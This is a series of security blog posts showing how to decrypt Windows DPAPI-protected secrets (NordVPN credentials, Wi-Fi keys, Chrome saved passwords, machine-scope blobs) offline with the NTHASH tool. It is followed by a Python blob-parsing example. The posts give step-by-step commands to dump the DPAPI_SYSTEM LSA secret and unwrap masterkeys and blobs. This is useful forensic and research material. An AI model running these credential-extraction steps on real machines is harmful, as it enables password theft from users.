Jan 27 2020
 

We now know that DPAPI secrets are everywhere, stored in various ways.

Let's have a look at a popular VPN client: NordVPN.
NordVPN stores its secrets (username/password) in an XML config file and protects them with a machine-scope DPAPI blob (not good if you ask me, since any user on that machine can decrypt it).

Let's see how to decrypt it.

1-Retrieve NordVPN's user.config from c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\

2-Retrieve the base64 values for username and password from it

Example of such a base64 string below:
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA
AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx
xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/
NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=

3-Decode it to a hex string

echo base64string| nthash-win64 /base64decodehexa

4-Save the hex string to a file

echo hexastring| nthash-win64 /hexatofile

or … steps 3 and 4 can be done in one go (pipe in… pipe out…) like below

echo base64string| nthash-win64 /base64decodehexa | nthash-win64 /hexatofile

5-Retrieve the masterkey GUID from the saved blob
nthash-win64 /decodeblob

6-Retrieve the DPAPI system key (the DPAPI_SYSTEM LSA secret)

nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(if the machine key does not work, try the user key)

7-Decrypt the (encrypted) masterkey with it

echo mydpapisyskey| nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52

8-Finally, decrypt the dpapi blob

echo mymksha1key| nthash-win64 /decodeblob

or … steps 6, 7 and 8 can be done in one go like below

NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob

Note that, online, any user logged on to that machine could simply do the below (the blob is machine scope, so no masterkey work is needed):

echo base64string| nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata

Jan 17 2020
 

In previous articles we have seen how to decrypt DPAPI blobs.

DPAPI blobs are not always stored as blob files.
They can be stored in different places (registry, config files, etc.) and in various formats: hexadecimal strings, but also base64 strings, etc.

Let's have a look at how Windows stores wifi passwords.

These are stored in XML files under C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces.
They can easily be found with: dir %programdata% /s /a /b | findstr /i interfaces

When logged on as the user, you can decrypt one with the command below:

NTHASH-win64 /wlansvc /binary:C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{2799BE4D-A2D4-417D-A774-481DBE1FF7FC}\{98B3A77A-3A5A-44A1-81AE-DDB88A168B24}.xml /system

Good news is that we can also decrypt these offline.

Run the above command on the offline copy.
NTHASH will tell you that it failed to decrypt it BUT it will dump the blob to data.blob.

From there (using the same steps as in the previous article):
-use /decodeblob to identify the masterkey GUID
-use /decodemk to decrypt the masterkey (locate it with dir %systemroot%\System32\Microsoft\Protect /s /a /b | findstr /i myguid) using the DPAPI system key
-use /decodeblob again, this time supplying the SHA1 key obtained in the previous step
-done 🙂

Jan 03 2020
 

In previous articles we have seen how to decrypt DPAPI blobs.

What about Chrome?
It uses user-scope DPAPI blobs to encrypt the passwords in its SQLite db (the "Login Data" file).
So, following the previous articles, nothing prevents one from decrypting a Chrome db offline.
(Caveat: from Chrome 80 on, password_value is AES-GCM encrypted under a key stored in the Local State file; that key is itself a user DPAPI blob, so the same steps apply to it, with one extra unwrapping step.)

3 steps:
-retrieve the encrypted passwords along with the masterkey GUID
-decrypt the masterkey
-retrieve the decrypted passwords with the decrypted masterkey

1/retrieve the encrypted passwords along with the masterkey GUID

nthash-win64 /chrome /binary:C:\temp\login data /input:0000000000000000000000000000000000000000
(/input is a dummy all-zero key here: at this stage we only want the masterkey GUID)

2/decrypt the masterkey (identified by its GUID in the previous step)
See the previous article for more details about this step.

NTHASH-win64.exe /decodemk /binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8 /input:xxE0CExx8C9903BxxDC5F1D8190xx33CF7C3DBxx

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting MasterKey ****
KEY:83D3D812E50FABxx83DA070D6C566DxxE3248A1AD873AxxD222F6B41342xx0EEBD790388FE2A21680A081723AA0C7B39EFxx5B16BB5xx48B94714xx38F1F5383
SHA1:xx920930CFB2A1CExxF9CB52153025535F548Fxx

3/retrieve the decrypted passwords with the decrypted masterkey

nthash-win64 /chrome /binary:C:\temp\login data /input:xx920930CFB2A1CExxF9CB52153025535F548Fxx

Jan 03 2020
 

In previous articles, we have seen how to decrypt user blobs and system blobs.

Let's now have a look at machine blobs: a blob which can be decrypted by any user, provided it is decrypted on the same machine, as opposed to user blobs which can only be decrypted by the user who created them.

5 steps:
-let's encrypt a blob
-let's decode the encrypted machine blob
-let's retrieve the DPAPI system key & decrypt the masterkey
-let's decrypt the encrypted machine blob
-conclusion

1/let's encrypt a blob

Let's encrypt the string "password" with machine scope:

NTHASH-win64.exe /cryptprotectdata /input:password /mode:MACHINE

2/let's decode the encrypted machine blob

NTHASH-win64.exe /decodeblob /binary:data.blob

->note dwFlags=4 (CRYPTPROTECT_LOCAL_MACHINE) = machine scope, and note the masterkey GUID it reports

3/let's retrieve the DPAPI system key & decrypt the masterkey

NTHASH-win64.exe /dumpsecret /input:dpapi_system /system
NTHASH 1.7 x64 by erwan2212@gmail.com
Impersonate:Système
Full:xx3CA961B1DCExxDF06CB359D981C1A3EB1D47xxxx398A7D34786F8DxxC152F318A4EDFFAxx2F73F
Machine:xx3CA961B1DCExxDF06CB359D981C1A3EB1D47xx
User:xx398A7D34786F8DxxC152F318A4EDFFAF02F7xx

(Machine is the first 20 bytes of Full and User the next 20; here the User half is the one that unprotects this masterkey.)

NTHASH-win64.exe /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 /input:xx398A7D34786F8DxxC152F318A4EDFFAF02F7xx

**** Unprotecting MasterKey ****
KEY:xx99D247D53699114CA06378DB77E4xxDD08A6BABBDB5277EB59C8309DBA8AA8B2D4C79900525F2FEE3909AC3894931093DxxD4BED96484791E2DCF512EB38E7
SHA1:xx017C46F5651Bxx27831F87050694FAD1B4DBxx

4/let's decrypt the encrypted machine blob

nthash-win64 /decodeblob /binary:data.blob /input:54017C46F5651B9627831F87050694FAD1B4DB31
NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting Blob ****
Blob:70617373776F7264

70617373776F7264 is the hex encoding of "password"

5/conclusion

Similar to system blobs, once you have the DPAPI system key it is rather trivial to decrypt such a blob.
Furthermore, it is not recommended to use machine blobs to store secrets, as any user on that machine will be able to decrypt them.
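The part of /decodeblob that all four posts lean on (step 5 of the NordVPN post, the "identify the masterkey guid" step of the wifi post, step 1 of the Chrome post, and step 2 above) is a walk over the DPAPI blob layout. Below is an added Python example of that walk; it is not NTHASH's code and does no decryption. It reads a blob (raw bytes or base64), reports its masterkey GUID and scope flag, lists where the matching masterkey file should sit on disk, splits the DPAPI_SYSTEM secret into the Machine/User halves printed in step 3 above, and tags rows of a Chrome Login Data table with the masterkey GUID protecting each password. Standard library only. The sample blob is the NordVPN value quoted in the Jan 27 post; the Login Data fixture (two constructed rows, an assumed subset of Chrome's columns) and the `<user SID>` placeholder are mine.

```python
"""Offline DPAPI blob triage (added example, not NTHASH's code; Python standard library only)."""
import base64
import sqlite3
import struct
import tempfile
import uuid

# Sample input: the base64 blob quoted from NordVPN's user.config in the Jan 27 post.
SAMPLE_B64 = (
    "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA"
    "AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx"
    "xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/"
    "NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=")
DPAPI_PROVIDER = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"  # guidProvider present in every blob
CRYPTPROTECT_LOCAL_MACHINE = 0x00000004  # dwFlags: machine scope, any local user can decrypt
CRYPTPROTECT_SYSTEM = 0x20000000         # dwFlags: SYSTEM scope (LSA secrets, Wlansvc profiles)
ALG = {0x6603: "3DES", 0x660E: "AES-128", 0x6610: "AES-256",
       0x8004: "SHA1", 0x800C: "SHA-256", 0x800E: "SHA-512"}

def parse_blob(blob) -> dict:
    """Walk the DPAPI_BLOB layout (little-endian DWORDs, length-prefixed fields); bytes or base64 in."""
    blob = base64.b64decode(blob) if isinstance(blob, str) else bytes(blob)
    off = 0

    def take(n: int) -> bytes:  # consume n bytes or fail loudly on a truncated blob
        nonlocal off
        if off + n > len(blob):
            raise ValueError("truncated blob")
        chunk, off = blob[off:off + n], off + n
        return chunk
    def u32() -> int:
        return struct.unpack("<I", take(4))[0]
    def field() -> bytes:
        return take(u32())
    def guid() -> str:
        return str(uuid.UUID(bytes_le=take(16)))  # Windows GUIDs are mixed-endian

    b = {"version": u32(), "provider": guid()}
    if b["version"] != 1 or b["provider"] != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    b["mk_version"], b["mk_guid"], b["flags"] = u32(), guid(), u32()
    b["description"] = field().decode("utf-16-le").rstrip("\x00")
    b["alg_crypt"], b["alg_crypt_bits"] = u32(), u32()
    b["salt"], b["hmac_key"] = field(), field()  # hmac_key is empty in practice
    b["alg_hash"], b["alg_hash_bits"] = u32(), u32()
    b["hmac2_key"], b["data"], b["sign"] = field(), field(), field()  # data is the ciphertext
    if off != len(blob):
        raise ValueError("trailing bytes after signature")
    b["scope"] = ("machine" if b["flags"] & CRYPTPROTECT_LOCAL_MACHINE else
                  "system" if b["flags"] & CRYPTPROTECT_SYSTEM else "user")
    return b

def masterkey_candidates(b: dict, user_sid: str = "<user SID>") -> list:
    """Where the masterkey file named by mk_guid should be. Machine and SYSTEM blobs use the
    S-1-5-18 store (both folders); try the DPAPI_SYSTEM machine half first, then the user half."""
    g = b["mk_guid"]
    if b["scope"] != "user":
        root = r"%SystemRoot%\System32\Microsoft\Protect\S-1-5-18"
        return [rf"{root}\{g}", rf"{root}\User\{g}"]
    return [rf"%APPDATA%\Microsoft\Protect\{user_sid}\{g}"]  # caller supplies the real SID

def split_dpapi_system(secret: bytes) -> tuple:
    """The LSA DPAPI_SYSTEM secret is 44 bytes: DWORD revision, 20-byte machine key,
    20-byte user key. NTHASH's Full/Machine/User lines are those last 40 bytes in hex."""
    secret = secret[4:] if len(secret) == 44 else secret
    if len(secret) != 40:
        raise ValueError("unexpected DPAPI_SYSTEM length")
    return secret[:20].hex().upper(), secret[20:].hex().upper()

def chrome_logins(db_path: str) -> list:
    """Tag each row of Chrome's 'Login Data' logins table with the masterkey GUID protecting
    password_value (the Chrome post's step 1); non-DPAPI values are flagged, not decrypted."""
    con = sqlite3.connect(db_path)
    rows = con.execute("SELECT origin_url, username_value, password_value FROM logins").fetchall()
    con.close()
    out = []
    for url, user, pw in rows:
        try:
            out.append((url, user, parse_blob(pw)["mk_guid"]))
        except ValueError as e:
            out.append((url, user, f"not a DPAPI blob: {e}"))  # e.g. Chrome 80+ 'v10' AES-GCM
    return out

def build_sample_login_data() -> str:
    """Constructed fixture: a two-row logins table (an assumed subset of Chrome's columns)."""
    path = tempfile.NamedTemporaryFile(suffix=".db", delete=False).name
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://vpn.example.test/", "alice", base64.b64decode(SAMPLE_B64)),
        ("https://mail.example.test/", "bob", b"v10" + bytes(28))])  # Chrome 80+ style value
    con.commit()
    con.close()
    return path

if __name__ == "__main__":
    b = parse_blob(SAMPLE_B64)
    print(b["mk_guid"], b["scope"], hex(b["flags"]), ALG.get(b["alg_crypt"]), ALG.get(b["alg_hash"]))
    print(*masterkey_candidates(b), *chrome_logins(build_sample_login_data()), sep="\n")
```

Run as a script, the NordVPN blob resolves to masterkey 90d6942d-4f31-4638-b756-d11efa906e52 with dwFlags 4 (machine scope), AES-256/SHA-512, which is exactly the GUID the NordVPN post feeds to /decodemk under the S-1-5-18 store. The actual unwrapping (masterkey with the DPAPI_SYSTEM half, then the blob with the masterkey's SHA1) is still the job of /decodemk and /decodeblob; this only tells you which file and which key to bring.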